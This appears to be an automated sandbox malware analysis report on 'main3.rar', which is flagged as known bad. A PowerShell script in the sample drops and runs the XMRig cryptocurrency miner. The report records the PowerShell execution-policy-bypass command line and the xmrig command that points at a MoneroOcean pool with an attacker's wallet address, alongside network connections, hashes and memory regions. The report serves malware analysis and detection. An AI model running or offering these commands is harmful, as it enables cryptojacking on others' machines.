Malware Analysis Report

2024-11-16 11:00

Sample ID 240704-dsawba1gqj
Target main3.rar
SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88

Threat Level: Known bad

The file main3.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-04 03:15

Signatures

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 11.73.50.20.in-addr.arpa udp

Files

memory/2112-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/2112-7-0x0000025C28710000-0x0000025C28732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoc2gr2j.bbn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2112-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2112-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2112-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2112-16-0x0000025C28700000-0x0000025C2870A000-memory.dmp

memory/2112-15-0x0000025C294C0000-0x0000025C294D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4944-47-0x000001683D4B0000-0x000001683D4D0000-memory.dmp

memory/4944-48-0x000001683D500000-0x000001683D520000-memory.dmp

memory/4944-49-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-50-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-52-0x000001683D520000-0x000001683D540000-memory.dmp

memory/2112-51-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/2112-53-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/4944-54-0x000001683D540000-0x000001683D560000-memory.dmp

memory/4944-55-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-56-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-57-0x000001683D520000-0x000001683D540000-memory.dmp

memory/4944-58-0x000001683D540000-0x000001683D560000-memory.dmp

memory/4944-59-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-60-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-61-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-62-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-63-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-64-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-65-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-66-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-67-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-68-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-69-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-70-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-71-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-72-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-73-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-74-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-75-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-76-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-77-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-78-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-79-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-80-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-81-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-82-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-83-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-84-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-85-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-86-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-87-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-88-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-89-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-90-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-91-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-92-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-93-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-94-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-95-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-96-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-97-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-98-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-99-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-100-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-101-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-102-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-103-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-104-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-105-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-106-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-107-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-108-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-109-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-110-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-111-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-112-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-113-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-114-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-115-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-116-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

memory/4944-117-0x00007FF68BF70000-0x00007FF68CBA3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win11-20240611-en

Max time kernel

1798s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 20.42.73.27:443 tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/3356-0-0x00007FFF51813000-0x00007FFF51815000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2d3ewes.ujh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3356-9-0x0000029866040000-0x0000029866062000-memory.dmp

memory/3356-10-0x00007FFF51810000-0x00007FFF522D2000-memory.dmp

memory/3356-11-0x00007FFF51810000-0x00007FFF522D2000-memory.dmp

memory/3356-12-0x00007FFF51810000-0x00007FFF522D2000-memory.dmp

memory/3356-14-0x0000029866520000-0x0000029866532000-memory.dmp

memory/3356-15-0x0000029866400000-0x000002986640A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2440-46-0x0000018AAEF80000-0x0000018AAEFA0000-memory.dmp

memory/2440-47-0x0000018AAF330000-0x0000018AAF350000-memory.dmp

memory/2440-48-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-50-0x0000018AAF350000-0x0000018AAF370000-memory.dmp

memory/2440-51-0x0000018AB0A90000-0x0000018AB0AB0000-memory.dmp

memory/3356-49-0x00007FFF51810000-0x00007FFF522D2000-memory.dmp

memory/3356-53-0x00007FFF51813000-0x00007FFF51815000-memory.dmp

memory/2440-52-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-54-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-55-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-56-0x0000018AAF350000-0x0000018AAF370000-memory.dmp

memory/2440-57-0x0000018AB0A90000-0x0000018AB0AB0000-memory.dmp

memory/2440-58-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-59-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-60-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-61-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-62-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-63-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-64-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-65-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-66-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-67-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-68-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-69-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-70-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-71-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-72-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-73-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-74-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-75-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-76-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-77-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-78-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-79-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-80-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-81-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-82-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-83-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-84-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-85-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-86-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-87-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-88-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-89-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-90-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-91-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-92-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-93-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-94-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-95-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-96-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-97-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-98-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-99-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-100-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-101-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-102-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-103-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-104-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-105-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-106-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-107-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-108-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-109-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-110-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-111-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-112-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-113-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-114-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-115-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

memory/2440-116-0x00007FF6B7310000-0x00007FF6B7F43000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

